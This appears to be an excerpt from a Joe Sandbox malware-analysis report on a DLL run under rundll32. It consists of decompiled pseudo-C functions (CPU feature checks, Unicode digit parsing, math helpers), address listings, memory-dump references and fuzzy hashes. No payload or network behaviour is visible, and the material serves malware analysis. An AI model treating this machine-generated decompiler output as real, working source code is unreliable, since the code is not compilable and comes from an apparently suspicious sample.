				if (r10d -  *(_t261 + 0x298) * _t147 >= 0) goto 0x535faeb6;
				_t219 = _t180;
				 *(_t261 + 0x478) = r9d ^ 0x00000c92 | _t219;
				_t245 =  *(_t261 + 0x110);
				if (_t245 - _t219 <= 0) goto 0x535faf04;
				 *(_t261 + 0x2a8) =  *(_t261 + 0x2a8) ^  *((intOrPtr*)(_t261 + 0x5e8)) +  *((intOrPtr*)(_t261 + 0x398));
				_t223 =  *(_t261 + 8) | _t245;
				 *(_t261 + 0x130) =  *(_t261 + 0x130) ^ _t223;
				 *(_t261 + 0x48) = _t223;
				goto 0x535faf04;
				_t248 =  *((intOrPtr*)(_t261 + 0x3d0)) + r11d & _t180;
				if ( *((intOrPtr*)(_t261 + 0x418)) == _t248) goto 0x535faf04;
				r9d = r9d + 3;
				if (r9d != _t248) goto 0x535faeed;
				 *(_t261 + 0x110) =  *(_t261 + 0x110) * (( *(_t258 + 0xf8) ^  *(_t261 + 0x338)) + 0xffffea7e);
				return _t268 + 0x82a;
			}




























                0x7ffa535faa40
                0x7ffa535faa54
                0x7ffa535faa5c
                0x7ffa535faa63
                0x7ffa535faa6b
                0x7ffa535faa79
                0x7ffa535faa87
                0x7ffa535faa94
                0x7ffa535faa9a
                0x7ffa535faaa1
                0x7ffa535faaa9
                0x7ffa535faaaf
                0x7ffa535faab7
                0x7ffa535faabe
                0x7ffa535faac5
                0x7ffa535faacc
                0x7ffa535faad3
                0x7ffa535faad7
                0x7ffa535faade
                0x7ffa535faaeb
                0x7ffa535faaf3
                0x7ffa535faafa
                0x7ffa535fab02
                0x7ffa535fab0a
                0x7ffa535fab14
                0x7ffa535fab23
                0x7ffa535fab29
                0x7ffa535fab33
                0x7ffa535fab37
                0x7ffa535fab3c
                0x7ffa535fab42
                0x7ffa535fab49
                0x7ffa535fab54
                0x7ffa535fab56
                0x7ffa535fab64
                0x7ffa535fab6b
                0x7ffa535fab72
                0x7ffa535fab7b
                0x7ffa535fab83
                0x7ffa535fab9c
                0x7ffa535faba3
                0x7ffa535fabb6
                0x7ffa535fabc1
                0x7ffa535fabc8
                0x7ffa535fabcd
                0x7ffa535fabd0
                0x7ffa535fabd6
                0x7ffa535fabe8
                0x7ffa535fabf3
                0x7ffa535fabff
                0x7ffa535fac02
                0x7ffa535fac14
                0x7ffa535fac25
                0x7ffa535fac30
                0x7ffa535fac37
                0x7ffa535fac45
                0x7ffa535fac48
                0x7ffa535fac56
                0x7ffa535fac66
                0x7ffa535fac70
                0x7ffa535fac7b
                0x7ffa535fac90
                0x7ffa535faca6
                0x7ffa535facae
                0x7ffa535facb6
                0x7ffa535facbb
                0x7ffa535facbf
                0x7ffa535facc3
                0x7ffa535facc8
                0x7ffa535facd6
                0x7ffa535facdc
                0x7ffa535facf3
                0x7ffa535facf7
                0x7ffa535facfa
                0x7ffa535fad08
                0x7ffa535fad10
                0x7ffa535fad21
                0x7ffa535fad26
                0x7ffa535fad2b
                0x7ffa535fad30
                0x7ffa535fad35
                0x7ffa535fad40
                0x7ffa535fad44
                0x7ffa535fad49
                0x7ffa535fad5a
                0x7ffa535fad62
                0x7ffa535fad70
                0x7ffa535fad78
                0x7ffa535fad87
                0x7ffa535fad9a
                0x7ffa535fadb1
                0x7ffa535fadb7
                0x7ffa535fadbf
                0x7ffa535fadc7
                0x7ffa535fadd8
                0x7ffa535fadf4
                0x7ffa535fae0d
                0x7ffa535fae2d
                0x7ffa535fae34
                0x7ffa535fae4d
                0x7ffa535fae4f
                0x7ffa535fae61
                0x7ffa535fae6d
                0x7ffa535fae77
                0x7ffa535fae8e
                0x7ffa535fae99
                0x7ffa535fae9c
                0x7ffa535faeb0
                0x7ffa535faeb4
                0x7ffa535faecd
                0x7ffa535faed3
                0x7ffa535faeed
                0x7ffa535faefb
                0x7ffa535faefd
                0x7ffa535faf1e

                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d3ed4ea9edc56720b8176b03aed4402a0dae7519b63c2286c6d7ac63d9ff4033
                • Instruction ID: c7cc8613d6c33c7b10c2d0a6f4d5019efd6fb57d436517014519ad7feb7bc9e4
                • Opcode Fuzzy Hash: d3ed4ea9edc56720b8176b03aed4402a0dae7519b63c2286c6d7ac63d9ff4033
                • Instruction Fuzzy Hash: 52C18BB360AB848BD7A4DF04E4827EA77A9F788794F14812ACB8D47B54DF38D548CB01
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535F1AD0 Relevance: .0, Instructions: 32COMMON
                Download Yara Rule
                C-Code - Quality: 86%
                			E00007FFA7FFA535F1AD0(signed int __rax, signed int __rdx, void* __r8, signed long long _a8) {
				intOrPtr _v12;
				intOrPtr _v20;
				intOrPtr _t11;
				intOrPtr _t15;
				intOrPtr* _t24;
				void* _t25;

				_t25 = __r8;
				r8d = 0;
				 *0x537557b0 = r8d;
				_t1 = _t25 + 1; // 0x1
				r9d = _t1;
				asm("cpuid");
				 *_t24 = r9d;
				 *((intOrPtr*)(_t24 + 8)) = 0;
				_v20 = _t11;
				_v12 = _t15;
				if (0 != 0x18001000) goto 0x535f1b31;
				asm("xgetbv");
				_a8 = __rdx << 0x00000020 | __rax;
				r8d =  *0x537557b0; // 0x1
				r8d =  ==  ? r9d : r8d;
				 *0x537557b0 = r8d;
				 *0x537557b4 = r8d;
				return 0;
			}









                0x7ffa535f1ad0
                0x7ffa535f1ad6
                0x7ffa535f1adb
                0x7ffa535f1ae2
                0x7ffa535f1ae2
                0x7ffa535f1ae9
                0x7ffa535f1aeb
                0x7ffa535f1af3
                0x7ffa535f1af9
                0x7ffa535f1afd
                0x7ffa535f1b03
                0x7ffa535f1b07
                0x7ffa535f1b11
                0x7ffa535f1b1b
                0x7ffa535f1b26
                0x7ffa535f1b2a
                0x7ffa535f1b31
                0x7ffa535f1b3f

                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 12714a0aa0805da834a40ae92795c237d78cfdcda44e27ff10ce6fdf81eed4e7
                • Instruction ID: 6dc950c68d7a7320f5d313b5d5f6876b914a6d893515b092a1801511546eb5ef
                • Opcode Fuzzy Hash: 12714a0aa0805da834a40ae92795c237d78cfdcda44e27ff10ce6fdf81eed4e7
                • Instruction Fuzzy Hash: 97F06871B2A795CBDB98CF28A4126297BE5F768390F94C43DD58D83B04D63C94608F04
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535E506C Relevance: 21.2, APIs: 14, Instructions: 238COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 461 7ffa535e506c-7ffa535e50b4 462 7ffa535e5180-7ffa535e519f call 7ffa535e9354 461->462 463 7ffa535e50ba-7ffa535e50c5 461->463 469 7ffa535e51b6-7ffa535e5220 call 7ffa535e917c call 7ffa535e9df0 call 7ffa535e9c0c 462->469 470 7ffa535e51a1-7ffa535e51b1 call 7ffa535e9df0 462->470 463->462 464 7ffa535e50cb-7ffa535e50d9 463->464 467 7ffa535e50e5 464->467 468 7ffa535e50db-7ffa535e50e3 464->468 471 7ffa535e50ed-7ffa535e5105 call 7ffa535e8fac 467->471 468->471 498 7ffa535e5222 469->498 499 7ffa535e5224-7ffa535e5255 call 7ffa535e9c0c call 7ffa535e9b4c 469->499 478 7ffa535e525a 470->478 480 7ffa535e5107 471->480 481 7ffa535e5110-7ffa535e5173 471->481 482 7ffa535e5261-7ffa535e5269 478->482 480->481 484 7ffa535e5109-7ffa535e510e 480->484 485 7ffa535e5177-7ffa535e517b 481->485 486 7ffa535e5278-7ffa535e52f1 call 7ffa535e8fac call 7ffa535e9df0 call 7ffa535e3b00 call 7ffa535e9c0c 482->486 487 7ffa535e526b-7ffa535e5272 482->487 484->485 489 7ffa535e53ff-7ffa535e5412 485->489 525 7ffa535e52f3 486->525 526 7ffa535e52f5-7ffa535e5332 call 7ffa535e558c call 7ffa535e3b00 call 7ffa535e9c0c call 7ffa535e9b4c 486->526 487->486 490 7ffa535e534e-7ffa535e5362 487->490 493 7ffa535e5419-7ffa535e5421 call 7ffa535ea718 489->493 494 7ffa535e5414-7ffa535e5417 489->494 496 7ffa535e5364-7ffa535e536c 490->496 497 7ffa535e536e 490->497 500 7ffa535e5424-7ffa535e5459 call 7ffa535f51e0 493->500 494->493 494->500 504 7ffa535e5376-7ffa535e538e call 7ffa535e8fac 496->504 497->504 498->478 498->499 499->478 515 7ffa535e5392-7ffa535e53e6 call 7ffa535e558c call 7ffa535e3b00 call 7ffa535e9c0c call 7ffa535e9b4c 504->515 516 7ffa535e5390 504->516 519 7ffa535e53eb-7ffa535e53fb call 7ffa535e9bbc 515->519 516->515 516->519 519->489 525->526 528 7ffa535e5337-7ffa535e5349 call 7ffa535e9b4c 525->528 526->528 528->482
                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: Xp_mulh$Xp_addx$Xp_setw$get_acsize
                • String ID:
                • API String ID: 2413281849-0
                • Opcode ID: 08556232719dacff47f9c58568dd6f539aeb3d9199d3a2cc78726d0cd2e48932
                • Instruction ID: 12b262dc170e12c1e4ed56f378007fa44dc94dc0932552693e172672b51512a9
                • Opcode Fuzzy Hash: 08556232719dacff47f9c58568dd6f539aeb3d9199d3a2cc78726d0cd2e48932
                • Instruction Fuzzy Hash: 6DC1C132E28B498AF701DB7694810FD7336AF9E344B48DB71EA0D329A5EF28B5459740
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535E6478 Relevance: 12.7, APIs: 3, Strings: 4, Instructions: 492COMMON
                Download Yara Rule
                C-Code - Quality: 74%
                			E00007FFA7FFA535E6478(void* __ebx, void* __ecx, void* __edx, void* __esi, signed short* __rax, long long __rbx, signed short** __rdx, long long __rsi, void* __r8, void* __r10) {
				void* _t133;
				void* _t165;
				void* _t189;
				void* _t192;
				signed short _t195;
				signed short _t196;
				signed short _t197;
				signed int _t198;
				signed int _t222;
				void* _t225;
				void* _t333;
				signed short* _t352;
				signed short* _t354;
				signed long long _t356;
				signed short* _t358;
				signed short* _t359;
				signed short* _t361;
				intOrPtr* _t362;
				long long _t370;
				long long* _t372;
				signed short* _t374;
				signed short* _t375;
				long long* _t378;
				long long* _t379;
				long long* _t383;
				long long* _t385;
				signed short** _t387;
				long long _t389;
				long long _t391;
				void* _t393;
				void* _t394;
				void* _t396;
				void* _t405;

				_t396 = __r8;
				_t389 = __rsi;
				_t370 = __rbx;
				 *((long long*)(_t393 + 8)) = __rbx;
				 *((long long*)(_t393 + 0x18)) = _t391;
				 *((long long*)(_t393 + 0x20)) = __rsi;
				_push(_t405);
				_t394 = _t393 - 0xa0;
				r13d = 0;
				sil = r9b;
				r15d = r8d;
				_t387 = __rdx;
				if ( *((intOrPtr*)(__rdx)) != _t405) goto 0x535e64ce;
				_t133 = E00007FFA7FFA535E8380(__rax);
				 *__rax = 0x16;
				E00007FFA7FFA535E8260(_t133);
				_t372 = _t387[1];
				if (_t372 == 0) goto 0x535e64c7;
				 *_t372 =  *_t387;
				goto 0x535e6c0f;
				if (r8d == 0) goto 0x535e64dc;
				if (__r8 - 2 - 0x22 > 0) goto 0x535e64a8;
				_t383 = _t372;
				E00007FFA7FFA535E4AE8(__rbx, _t394 + 0x78, _t383);
				 *((long long*)(_t394 + 0x98)) =  *_t387;
				goto 0x535e6512;
				_t352 =  *_t387;
				_t195 =  *_t352 & 0x0000ffff;
				 *_t387 =  &(_t352[1]);
				if (E00007FFA7FFA535E8604(_t195, _t195 & 0x0000ffff, _t225, _t370, _t394 + 0x78) != 0) goto 0x535e6508;
				bpl = sil != 0;
				if (_t195 != 0x2d) goto 0x535e6538;
				goto 0x535e653e;
				if (_t195 != 0x2b) goto 0x535e654b;
				_t354 =  *_t387;
				_t196 =  *_t354 & 0x0000ffff;
				 *_t387 =  &(_t354[1]);
				 *((intOrPtr*)(_t394 + 0x74)) = 0x66a;
				 *((intOrPtr*)(_t394 + 0xd8)) = 0xaf0;
				 *((intOrPtr*)(_t394 + 0x50)) = 0xb66;
				 *((intOrPtr*)(_t394 + 0x28)) = 0xb70;
				r11d = 0xff10;
				 *((intOrPtr*)(_t394 + 0x68)) = 0xc66;
				_t14 = _t389 - 0x80; // 0x9e6
				r10d = _t14;
				 *((intOrPtr*)(_t394 + 0x30)) = 0xc70;
				 *((intOrPtr*)(_t394 + 0x58)) = 0xce6;
				r8d = 0x6f0;
				 *((intOrPtr*)(_t394 + 0x38)) = 0xcf0;
				r9d = 0x966;
				 *((intOrPtr*)(_t394 + 0x70)) = 0xd66;
				 *((intOrPtr*)(_t394 + 0x40)) = 0xd70;
				 *((intOrPtr*)(_t394 + 0x60)) = 0xe50;
				 *((intOrPtr*)(_t394 + 0x48)) = 0xe5a;
				 *((intOrPtr*)(_t394 + 0x6c)) = 0xed0;
				 *((intOrPtr*)(_t394 + 0x20)) = 0xeda;
				 *((intOrPtr*)(_t394 + 0x24)) = 0xf20;
				 *((intOrPtr*)(_t394 + 0x2c)) = 0xf2a;
				 *((intOrPtr*)(_t394 + 0x34)) = 0x1040;
				 *((intOrPtr*)(_t394 + 0x3c)) = 0x104a;
				 *((intOrPtr*)(_t394 + 0x44)) = 0x17e0;
				 *((intOrPtr*)(_t394 + 0x4c)) = 0x17ea;
				 *((intOrPtr*)(_t394 + 0x54)) = 0x1810;
				 *((intOrPtr*)(_t394 + 0x5c)) = 0x181a;
				 *((intOrPtr*)(_t394 + 0x64)) = 0xff1a;
				if ((r15d & 0xffffffef) != 0) goto 0x535e68e2;
				if (_t196 - 0x30 < 0) goto 0x535e6808;
				if (_t196 - 0x3a >= 0) goto 0x535e6656;
				goto 0x535e6803;
				if (_t196 - r11w >= 0) goto 0x535e67f1;
				if (_t196 - 0x660 < 0) goto 0x535e6808;
				if (_t196 -  *((intOrPtr*)(_t394 + 0x74)) >= 0) goto 0x535e667a;
				goto 0x535e6803;
				if (_t196 - r8w < 0) goto 0x535e6808;
				if (_t196 - 0x6fa >= 0) goto 0x535e6699;
				goto 0x535e6803;
				if (_t196 - r9w < 0) goto 0x535e6808;
				if (_t196 - 0x970 >= 0) goto 0x535e66b8;
				goto 0x535e6803;
				if (_t196 - r10w < 0) goto 0x535e6808;
				if (_t196 - 0x9f0 >= 0) goto 0x535e66d7;
				goto 0x535e6803;
				if (_t196 - 0xa66 < 0) goto 0x535e6808;
				if (_t196 - 0xa70 >= 0) goto 0x535e66f4;
				goto 0x535e6803;
				if (_t196 - (_t196 & 0x0000ffff) - 0xa66 < 0) goto 0x535e6808;
				if (_t196 -  *((intOrPtr*)(_t394 + 0xd8)) >= 0) goto 0x535e6714;
				goto 0x535e6803;
				if (_t196 -  *((intOrPtr*)(_t394 + 0x50)) < 0) goto 0x535e6808;
				if (_t196 -  *((intOrPtr*)(_t394 + 0x28)) < 0) goto 0x535e6670;
				if (_t196 -  *((intOrPtr*)(_t394 + 0x68)) < 0) goto 0x535e6808;
				if (_t196 -  *((intOrPtr*)(_t394 + 0x30)) < 0) goto 0x535e6670;
				if (_t196 -  *((intOrPtr*)(_t394 + 0x58)) < 0) goto 0x535e6808;
				if (_t196 -  *((intOrPtr*)(_t394 + 0x38)) < 0) goto 0x535e6670;
				if (_t196 -  *((intOrPtr*)(_t394 + 0x70)) < 0) goto 0x535e6808;
				if (_t196 -  *((intOrPtr*)(_t394 + 0x40)) < 0) goto 0x535e6670;
				if (_t196 -  *((intOrPtr*)(_t394 + 0x60)) < 0) goto 0x535e6808;
				if (_t196 -  *((intOrPtr*)(_t394 + 0x48)) < 0) goto 0x535e6670;
				if (_t196 -  *((intOrPtr*)(_t394 + 0x6c)) < 0) goto 0x535e6808;
				if (_t196 -  *((intOrPtr*)(_t394 + 0x20)) < 0) goto 0x535e6670;
				if (_t196 -  *((intOrPtr*)(_t394 + 0x24)) < 0) goto 0x535e6808;
				if (_t196 -  *((intOrPtr*)(_t394 + 0x2c)) < 0) goto 0x535e6670;
				if (_t196 -  *((intOrPtr*)(_t394 + 0x34)) < 0) goto 0x535e6808;
				if (_t196 -  *((intOrPtr*)(_t394 + 0x3c)) < 0) goto 0x535e6670;
				if (_t196 -  *((intOrPtr*)(_t394 + 0x44)) < 0) goto 0x535e6808;
				if (_t196 -  *((intOrPtr*)(_t394 + 0x4c)) < 0) goto 0x535e6670;
				if (_t196 -  *((intOrPtr*)(_t394 + 0x54)) < 0) goto 0x535e6808;
				if (_t196 -  *((intOrPtr*)(_t394 + 0x5c)) >= 0) goto 0x535e6808;
				goto 0x535e6670;
				if (_t196 -  *((intOrPtr*)(_t394 + 0x64)) >= 0) goto 0x535e6800;
				goto 0x535e6803;
				if (((_t196 & 0x0000ffff) - r11d | 0xffffffff) != 0xffffffff) goto 0x535e6831;
				_t58 = _t370 - 0x41; // 0xfecf
				if (_t58 - 0x19 <= 0) goto 0x535e681f;
				_t59 = _t370 - 0x61; // 0xfeaf
				if (_t59 - 0x19 <= 0) goto 0x535e681f;
				goto 0x535e6831;
				_t60 = _t370 - 0x61; // 0xfeaf
				if (_t60 - 0x19 > 0) goto 0x535e682e;
				if ((_t196 & 0x0000ffff) - 0x20 + 0xffffffc9 == 0) goto 0x535e6845;
				if (r15d != 0) goto 0x535e6894;
				_t61 = _t389 + 2; // 0xa
				r15d = _t61;
				goto 0x535e6894;
				_t356 =  *_t387;
				r8d = 0xffdf;
				_t222 =  *_t356 & 0x0000ffff;
				_t62 = _t356 + 2; // 0xffe1
				_t374 = _t62;
				 *_t387 = _t374;
				_t63 = _t383 - 0x58; // 0x608
				if ((r8w & _t63) == 0) goto 0x535e68ca;
				r15d =  ==  ? 8 : r15d;
				_t375 =  &(_t374[0xffffffffffffffff]);
				 *_t387 = _t375;
				if (_t222 == 0) goto 0x535e688f;
				if ( *_t375 == _t222) goto 0x535e688f;
				_t165 = E00007FFA7FFA535E8380(_t356);
				 *_t356 = 0x16;
				E00007FFA7FFA535E8260(_t165);
				r11d = 0xff10;
				r13d = 0x660;
				r12d = 0x6f0;
				if (_t196 - 0x30 < 0) goto 0x535e6a8c;
				if (_t196 - 0x3a >= 0) goto 0x535e68e9;
				r8d = _t196 & 0x0000ffff;
				r8d = r8d - 0x30;
				goto 0x535e6a86;
				_t197 =  *_t375 & 0x0000ffff;
				r15d =  ==  ? 0x10 : r15d;
				_t70 =  &(_t375[1]); // 0xffe3
				_t358 = _t70;
				 *_t387 = _t358;
				goto 0x535e688f;
				goto 0x535e6894;
				if (_t197 - r11w >= 0) goto 0x535e6a72;
				if (_t197 - r13w < 0) goto 0x535e6a8c;
				if (_t197 - 0x66a >= 0) goto 0x535e6913;
				r8d = _t197 & 0x0000ffff;
				r8d = r8d - r13d;
				goto 0x535e6a86;
				if (_t197 - r12w < 0) goto 0x535e6a8c;
				if (_t197 - 0x6fa >= 0) goto 0x535e6933;
				r8d = _t197 & 0x0000ffff;
				r8d = r8d - r12d;
				goto 0x535e6a86;
				if (_t197 - 0x966 < 0) goto 0x535e6a8c;
				_t71 =  &(_t358[5]); // 0x970
				r8d = _t71;
				if (_t197 - r8w >= 0) goto 0x535e6957;
				r8d = _t197 & 0x0000ffff;
				r8d = r8d - 0x966;
				goto 0x535e6a86;
				if (_t197 - 0x9e6 < 0) goto 0x535e6a8c;
				_t72 =  &(_t358[5]); // 0x9f0
				r8d = _t72;
				if (_t197 - r8w < 0) goto 0x535e694b;
				_t73 = _t396 + 0x76; // 0xa66
				if (_t197 - _t73 < 0) goto 0x535e6a8c;
				_t74 =  &(_t358[5]); // 0xa70
				r8d = _t74;
				if (_t197 - r8w < 0) goto 0x535e694b;
				_t75 = _t396 + 0x76; // 0xae6
				if (_t197 - _t75 < 0) goto 0x535e6a8c;
				if (_t197 -  *((intOrPtr*)(_t394 + 0xd8)) < 0) goto 0x535e694b;
				if (_t197 -  *((intOrPtr*)(_t394 + 0x50)) < 0) goto 0x535e6a8c;
				if (_t197 -  *((intOrPtr*)(_t394 + 0x28)) < 0) goto 0x535e694b;
				if (_t197 -  *((intOrPtr*)(_t394 + 0x68)) < 0) goto 0x535e6a8c;
				if (_t197 -  *((intOrPtr*)(_t394 + 0x30)) < 0) goto 0x535e694b;
				if (_t197 -  *((intOrPtr*)(_t394 + 0x58)) < 0) goto 0x535e6a8c;
				if (_t197 -  *((intOrPtr*)(_t394 + 0x38)) < 0) goto 0x535e694b;
				if (_t197 -  *((intOrPtr*)(_t394 + 0x70)) < 0) goto 0x535e6a8c;
				if (_t197 -  *((intOrPtr*)(_t394 + 0x40)) < 0) goto 0x535e694b;
				if (_t197 -  *((intOrPtr*)(_t394 + 0x60)) < 0) goto 0x535e6a8c;
				if (_t197 -  *((intOrPtr*)(_t394 + 0x48)) < 0) goto 0x535e694b;
				if (_t197 -  *((intOrPtr*)(_t394 + 0x6c)) < 0) goto 0x535e6a8c;
				if (_t197 -  *((intOrPtr*)(_t394 + 0x20)) < 0) goto 0x535e694b;
				if (_t197 -  *((intOrPtr*)(_t394 + 0x24)) < 0) goto 0x535e6a8c;
				if (_t197 -  *((intOrPtr*)(_t394 + 0x2c)) < 0) goto 0x535e694b;
				if (_t197 -  *((intOrPtr*)(_t394 + 0x34)) < 0) goto 0x535e6a8c;
				if (_t197 -  *((intOrPtr*)(_t394 + 0x3c)) < 0) goto 0x535e694b;
				if (_t197 -  *((intOrPtr*)(_t394 + 0x44)) < 0) goto 0x535e6a8c;
				if (_t197 -  *((intOrPtr*)(_t394 + 0x4c)) < 0) goto 0x535e694b;
				if (_t197 -  *((intOrPtr*)(_t394 + 0x54)) < 0) goto 0x535e6a8c;
				if (_t197 -  *((intOrPtr*)(_t394 + 0x5c)) >= 0) goto 0x535e6a8c;
				goto 0x535e694b;
				if (_t197 -  *((intOrPtr*)(_t394 + 0x64)) >= 0) goto 0x535e6a82;
				r8d = _t197 & 0x0000ffff;
				r8d = r8d - r11d;
				goto 0x535e6a86;
				r8d = r8d | 0xffffffff;
				if (r8d != 0xffffffff) goto 0x535e6ab9;
				_t98 = _t370 - 0x41; // 0xfecf
				if (_t98 - 0x19 <= 0) goto 0x535e6aa4;
				_t99 = _t370 - 0x61; // 0xfeaf
				if (_t99 - 0x19 <= 0) goto 0x535e6aa4;
				r8d = r8d | 0xffffffff;
				goto 0x535e6ab9;
				_t100 = _t370 - 0x61; // 0xfeaf
				r8d = _t197 & 0x0000ffff;
				if (_t100 - 0x19 > 0) goto 0x535e6ab5;
				r8d = r8d - 0x20;
				r8d = r8d + 0xffffffc9;
				if (r8d == 0xffffffff) goto 0x535e6afe;
				if (r8d - r15d >= 0) goto 0x535e6afe;
				_t333 = _t405 - (_t356 | 0xffffffff);
				if (_t333 < 0) goto 0x535e6ada;
				if (_t333 != 0) goto 0x535e6ad5;
				if (_t358 - _t383 <= 0) goto 0x535e6ada;
				goto 0x535e6aec;
				r14d = r8d;
				_t359 =  *_t387;
				_t198 =  *_t359 & 0x0000ffff;
				 *_t387 =  &(_t359[1]);
				goto 0x535e68af;
				 *_t387 =  &(( *_t387)[0xffffffffffffffff]);
				r13d = 0;
				_t361 =  *_t387;
				if (_t198 == 0) goto 0x535e6b2a;
				if ( *_t361 == _t198) goto 0x535e6b2a;
				_t189 = E00007FFA7FFA535E8380(_t361);
				 *_t361 = 0x16;
				E00007FFA7FFA535E8260(_t189);
				if ((sil & bpl) != 0) goto 0x535e6b51;
				 *_t387 =  *((intOrPtr*)(_t394 + 0x98));
				if ( *((intOrPtr*)(_t394 + 0x90)) == r13b) goto 0x535e64b8;
				_t362 =  *((intOrPtr*)(_t394 + 0x78));
				 *(_t362 + 0x3a8) =  *(_t362 + 0x3a8) & 0xfffffffd;
				goto 0x535e64b8;
				if (E00007FFA7FFA535E6118(r13d | 0xe) == 0) goto 0x535e6bde;
				_t192 = E00007FFA7FFA535E8380(_t362);
				 *_t362 = 0x22;
				if ((bpl & 0x00000001) != 0) goto 0x535e6b76;
				goto 0x535e6be7;
				if ((bpl & 0x00000002) == 0) goto 0x535e6bad;
				if ( *((intOrPtr*)(_t394 + 0x90)) == r13b) goto 0x535e6b92;
				 *( *((intOrPtr*)(_t394 + 0x78)) + 0x3a8) =  *( *((intOrPtr*)(_t394 + 0x78)) + 0x3a8) & 0xfffffffd;
				_t378 = _t387[1];
				if (_t378 == 0) goto 0x535e6ba1;
				 *_t378 =  *_t387;
				goto 0x535e6c0f;
				if ( *((intOrPtr*)(_t394 + 0x90)) == r13b) goto 0x535e6bc3;
				 *( *((intOrPtr*)(_t394 + 0x78)) + 0x3a8) =  *( *((intOrPtr*)(_t394 + 0x78)) + 0x3a8) & 0xfffffffd;
				_t379 = _t387[1];
				if (_t379 == 0) goto 0x535e6bd2;
				 *_t379 =  *_t387;
				goto 0x535e6c0f;
				if ((bpl & 0x00000002) == 0) goto 0x535e6be7;
				if ( *((intOrPtr*)(_t394 + 0x90)) == r13b) goto 0x535e6bfd;
				 *( *((intOrPtr*)(_t394 + 0x78)) + 0x3a8) =  *( *((intOrPtr*)(_t394 + 0x78)) + 0x3a8) & 0xfffffffd;
				_t385 = _t387[1];
				if (_t385 == 0) goto 0x535e6c0c;
				 *_t385 =  *_t387;
				return _t192;
			}




































                0x7ffa535e6478
                0x7ffa535e6478
                0x7ffa535e6478
                0x7ffa535e6478
                0x7ffa535e647d
                0x7ffa535e6482
                0x7ffa535e648a
                0x7ffa535e6490
                0x7ffa535e6497
                0x7ffa535e649a
                0x7ffa535e649d
                0x7ffa535e64a0
                0x7ffa535e64a6
                0x7ffa535e64a8
                0x7ffa535e64ad
                0x7ffa535e64b3
                0x7ffa535e64b8
                0x7ffa535e64bf
                0x7ffa535e64c4
                0x7ffa535e64c9
                0x7ffa535e64d1
                0x7ffa535e64da
                0x7ffa535e64dc
                0x7ffa535e64e4
                0x7ffa535e64ef
                0x7ffa535e6506
                0x7ffa535e6508
                0x7ffa535e650b
                0x7ffa535e6514
                0x7ffa535e6521
                0x7ffa535e6529
                0x7ffa535e6531
                0x7ffa535e6536
                0x7ffa535e653c
                0x7ffa535e653e
                0x7ffa535e6541
                0x7ffa535e6548
                0x7ffa535e654b
                0x7ffa535e6558
                0x7ffa535e6568
                0x7ffa535e6575
                0x7ffa535e657d
                0x7ffa535e6583
                0x7ffa535e658b
                0x7ffa535e658b
                0x7ffa535e658f
                0x7ffa535e659c
                0x7ffa535e65a4
                0x7ffa535e65aa
                0x7ffa535e65b2
                0x7ffa535e65b8
                0x7ffa535e65c0
                0x7ffa535e65c8
                0x7ffa535e65d0
                0x7ffa535e65d8
                0x7ffa535e65e0
                0x7ffa535e65e8
                0x7ffa535e65f0
                0x7ffa535e65f8
                0x7ffa535e6600
                0x7ffa535e6608
                0x7ffa535e6610
                0x7ffa535e6618
                0x7ffa535e6620
                0x7ffa535e6628
                0x7ffa535e6637
                0x7ffa535e6640
                0x7ffa535e664a
                0x7ffa535e6651
                0x7ffa535e665a
                0x7ffa535e6663
                0x7ffa535e666e
                0x7ffa535e6675
                0x7ffa535e667e
                0x7ffa535e668c
                0x7ffa535e6694
                0x7ffa535e669d
                0x7ffa535e66ab
                0x7ffa535e66b3
                0x7ffa535e66bc
                0x7ffa535e66ca
                0x7ffa535e66d2
                0x7ffa535e66da
                0x7ffa535e66e8
                0x7ffa535e66ef
                0x7ffa535e66f7
                0x7ffa535e6705
                0x7ffa535e670f
                0x7ffa535e671b
                0x7ffa535e6726
                0x7ffa535e6733
                0x7ffa535e673e
                0x7ffa535e674b
                0x7ffa535e6756
